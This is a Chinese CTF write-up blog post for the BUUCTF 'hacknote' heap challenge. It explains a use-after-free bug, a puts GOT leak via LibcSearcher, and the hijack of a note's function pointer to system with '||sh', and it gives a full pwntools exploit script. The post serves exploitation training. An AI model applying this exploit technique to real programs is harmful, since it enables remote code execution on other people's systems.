BUUCTF Hacknote

最新推荐文章于 2024-01-29 02:22:19 发布
最新推荐文章于 2024-01-29 02:22:19 发布
阅读量2.5k 收藏
点赞数
文章标签: 系统安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_51821131/article/details/121705125
版权

Hacknote

分析过程

在这里插入图片描述

检查一下保护,无pie,32位,谨记啊,程序的位数,这次就吃亏了
在这里插入图片描述

明显的堆题,不过这次没有edit函数

在这里插入图片描述
在这里插入图片描述

Add函数,最多创建5个堆,先malloc一个0x10的堆,然后把上面函数的地址赋给第一位,第二字赋给我们即将创建的size大小的堆
在这里插入图片描述

Free函数,输入index,free对应堆块,只是这里没有对指针进行清零,存在UAF漏洞
在这里插入图片描述

Dump函数通过指针调用,一看就可以泄露

整理一下思路,我们可以通过创建2个大于0x10大小的堆,然后free掉他们,然后申请一个0x10的堆,就能将这2个0x10的堆利用起来了,此时在利用UAF漏洞,就能得到一个真实地址了

add(24,‘aaaa’)
add(24,‘bbbb’)
delete(0)
delete(1)

下面我们gdb看看
在这里插入图片描述

可以看到所有的堆都被free了,其中有2个0x10大小的堆
在这里插入图片描述

内部结构大概是这样

然后我们在申请一次
payload=p32(addr)+p32(puts_got)
add(8,payload)
在这里插入图片描述
在这里插入图片描述

可以看到我们将0x0804862b重新写入了0x85b6008处,并将puts函数的got表写到了后面,之后dump一下0堆,就可以调用0x85b6008对应的函数,将puts的got表里面的值打印出来
dump(0)
puts_addr=u32(p.recv(4))
libc=LibcSearcher(‘puts’,puts_addr)
offest=puts_addr-libc.dump(‘puts’)
print hex(offest)
sys_addr=offest+libc.dump(‘system’)
有了这个真实地址后,可以通过libcsearcher找到system函数的真实地址
接下来重复上面一次,将system的地址写到堆块的第一位上,第二位写上||sh,然后dump一次堆块0就能调用system(system;sh)
这里分号是linux下的一个命令,相当于隔开前面的内容,进行命令

delete(2)
add(8,p32(sys_addr)+’||sh’)
dump(0)

这里我一直犯了一个错,一开始没注意到程序是32位的,libc一直用的64的,一直出不来结果,连offest后三位也不0,虽然一直感觉有问题,直到后面换用了libcseacher,找出来的版本显示为i386才发觉libc有问题,也算长记性了

Exp

from pwn import *
from LibcSearcher import *

p=process('./hacknote')
#p=remote('node4.buuoj.cn',27677)
elf=ELF('./hacknote')
#libc=ELF('./libc_32.so.6')
puts_got=elf.got['puts']
addr=0x0804862b

def add(size,content):
	p.recvuntil("Your choice :")
	p.sendline('1')
	p.recvuntil("Note size :")
	p.sendline(str(size))
	p.recvuntil("Content :")
	p.send(content)

def delete(index):
	p.recvuntil("Your choice :")
	p.sendline('2')
	p.recvuntil("Index :")
	p.sendline(str(index))

def dump(index):
	p.recvuntil("Your choice :")
	p.sendline('3')
	p.recvuntil("Index :")
	p.sendline(str(index))

add(24,'aaaa')
add(24,'bbbb')
#add(24,'dddd')

delete(0)
delete(1)

payload=p32(addr)+p32(puts_got)
add(8,payload)

dump(0)
puts_addr=u32(p.recv(4))

libc=LibcSearcher('puts',puts_addr)
offest=puts_addr-libc.dump('puts')
#offest=puts_addr-libc.sym['puts']
print hex(offest)
sys_addr=offest+libc.dump('system')

delete(2)
gdb.attach(p)
add(8,p32(sys_addr)+'||sh')
#gdb.attach(p)

dump(0)

p.interactive()
Nagash1
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
BUUCTF逆向前八题
01-24
在本篇中,我们将探讨在BUUCTF储备赛中遇到的前八道逆向题目,通过这些题目来学习如何使用逆向工具,如exeinfo和IDA,以及如何解析汇编代码以获取关键信息。 1. Easyre: 这道题首先使用exeinfo查看文件信息,确认...
uaf-逻辑题-BUUCTF hacknote
csdn546229768的博客
11-28 329
首先拿到题目是个菜单题,在ida中进行手动识别重命名函数如图: 首先按照程序流程配合程序一起分析add函数如图: 通过上面分析可知,ptr_array是一个全局数组长度为5,然后进入if判断这个“*(&ptr_array + i)”也就是ptr_array[i]那么这就对每个数组里面的内容进行判空,那就是说这个数组里面的数据是否被add过。 然后就是给数组里面每个分配了一个大小为8byte的chunk实际分配是0x10,然后这句“**(&ptr_array + i) = m_puts”实
buuctf hacknote
qq_65147345的博客
07-17 827
程序有uaf漏洞,可以通过uaf漏洞更改输出函数为........
什么是私有地址?如何分类?
热门推荐
qq_44047479的博客
10-30 2万+
什么是私有地址?如何分类? 在现在的网络中,IP地址分为公网IP地址和私有IP地址。 公网IP是在Internet使用的IP地址,而私有IP地址则是在局域网中使用的IP地址。 私有IP地址是一段保留的IP地址。只使用在局域网中,无法在Internet上使用。 当私有网络内的主机要与位于公网上的主机进行通讯时必须经过地址转换,将其私有地址转换为合法公网地址才能对外访问。 NAT-Network Address Translation 网络地址转换 所谓的私有地址就是在互联网上不使用,而被用在局域网络中的地址
[BUUCTF]-PWN:pwnable_hacknote解析
2301_79326813的博客
01-29 308
先看保护32位,没开pie,got表可修改看ida总的来说就是alloc创建堆块,free释放堆块,show打印堆块内容但alloc处的函数比较特别,他会先申请一个0x8大小的堆来存放与puts相关的指针。
(BUUCTF)huxiangbei_2019_hacknote
xy1458214551的博客
11-30 73
buuctf的huxiangbei_2019_hacknote
BasicASM.s(BUUCTF
06-04
分析过程文件
BUUCTF题目(含工具),你竟然赶我走、乌镇峰会种图、你竟然赶我走、大白、(超级详细)“小白”入坑CTF,先入手杂项部分
04-09
BUUCTF题目(含工具),你竟然赶我走、乌镇峰会种图、你竟然赶我走、大白、(超级详细)“小白”入坑CTF,先入手杂项部分
BUUCTF部分web题目
最新发布
05-06
写题记录
BUUCTF】MISC zip
01-20
import zipfile import string import binascii def CrackCrc(crc): for i in dic: for j in dic: for p in dic: for q in dic: s = i + j + p + q if crc == (binascii.crc32(s.encode())): ...
hacknote.zip
12-30
本题目是攻防世界一道6分的堆漏洞题目,在ctf wiki上面有比较详细的解析和漏洞利用,几乎一模一样,但区别是这道题没有后门函数,所以漏洞利用的方式发生了变化,推荐大家动手分析。
BUUCTF-PWN-pwnable_hacknote-UAF
Rt1Text的博客
07-10 1055
标准的菜单模式canary和NX保护 2.sub_80487D4() 3.sub_80488A5() 利用思路 泄露libc,调用system,执行bin/sh/,获取shellprint note可以打印泄露地址传入该函数的参数是note结构体自身,无法直接传入字符串“\bin\sh”,原来的note_puts(arg0)是对puts(arg0+4)的封装,而现在的system(arg0)中arg0并不指向字符串而指向system的地址,所以这里需要system参数截断,system
xctf攻防世界——hacknote
05-09 313
32位程序,未开PIE  #use after free #system("xxxx||sh") 程序逻辑 1 void __cdecl __noreturn main() 2 { 3 int choice; // eax 4 char buf; // [esp+8h] [ebp-10h] 5 unsigned int v2; // [esp+...
攻防世界PWN之Hacknote题解
seaaseesa的博客
11-09 1440
Hacknote 首先,查看程序的保护机制 然后拖入IDA分析 这是创建堆,并写入信息。 经过分析,大概是这样的 typedefstructNote{ void*func;//函数指针 char*buf;//内容指针 }Note; //保存Node的指针数组 Note*notes[5]; int...
(攻防世界)(pwn)hacknote
PLpa的博客
07-31 3398
use after free 堆!堆!堆! 终于对堆的结构有了一定的了解,开始做堆的题目,恰巧攻防世界xctf中有这么一题可以练练手,还是挺不错的。。。 对于use after free呢,这里有ctf-wiki的学习资料:https://ctf-wiki.github.io/ctf-wiki/pwn/linux/glibc-heap/use_after_free-zh/ 写的非常详细,很实用...
pwn hacknote
doudoudedi
10-28 367
这道题增加堆块会将printf函数的got表地址和将要打印的地址放入一个申请的堆块里面存在uaf漏洞可以先创建2个堆块然后释放申请0x8大小的堆块根据堆分配的原则我们先使用1的第一个然后使用0的第一个然后就修改了指针指向读到flag的函数即可 exp: from pwn import * p=process('./hacknote') elf=ELF('./hacknote') def debug...
pwnable.tw hacknote write up
qq_43189757的博客
09-08 235
程序分析: 程序有四个操作: 1.Add note 2.Delete note 3.Print note 4.Exit 1.Add note 在bss段中存放note的指针,每一个note 包含两个堆块,add的过程中第一个堆块的数据区的开始四字节存放调用puts的函数地址(0x804862b),随后四个字节存放后面存放content 的堆块的地址 2.Delete note 漏洞点发生在Dele...
BUUCTF pwn 五月刷题
coco的博客
05-04 680
actf_2019_babystack 典型的stack pivot,告诉了输入时候栈的地址,我们可以通过伪造ebp,通过两次leave将esp指向开始时候的栈地址。注意的是这里system("/bin/sh")有问题,换了one gadget才成功,不是很清楚为什么。 from pwn import * context.log_level = "debug" context.terminal ...
BUUCTF hitcontraining_uaf
BengDouLove的博客
04-09 926
这是我第一次自己做出来的堆题,,????动 没什么特别,,看一看代码 还是一个堆块管理系统,不过这次他管理的时候有些不一样 1.add 不一样就在这里,,如果要创建一个用户数据,,先malloc一个八字节的指针堆块(我这么叫。。里面放着指针),,这八字节,前四个字节是一个pirnt_note_content函数,,这个函数的作用是以他后面相邻四个字节的数据为指针,打印这个指针里面的内容;;;申请...
buuctf wireshark
09-12
根据您提供的引用内容,buuctf wireshark 是一个与buuctf比赛相关的题目。其中,Wireshark 是一个网络封包分析软件,可以用来捕获和分析网络数据包。根据[1]中提供的下载地址,可以下载 Wireshark 软件进行使用。 在buuctf wireshark题目中,黑客通过使用Wireshark抓到了管理员登陆网站时的一段流量包,并将其中的密码作为flag。解题思路是使用Wireshark打开下载的文件,然后根据题目提示,在流量包中找到管理员登陆网站时的请求,该请求方式为POST类型,可以通过过滤条件 `http.request.method==POST` 来筛选出该请求。在该请求中,可以找到管理员的密码,作为flag提交。 不过,需要注意的是,获取到的flag需要加上 `flag{}` 并进行提交。 此外,根据中的提到的方法,您也可以直接将下载的图片文件扔到WinHex中进行查看,以便寻找是否存在flag。但是,请注意在buuctf wireshark题目中的具体解题思路仍然是通过Wireshark分析流量包。 总结起来,对于buuctf wireshark题目,您需要下载Wireshark软件,打开下载的文件,并根据题目提示找到管理员登陆网站时的流量包,从中获取管理员的密码作为flag,最后在提交flag时记得加上 `flag{}`。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值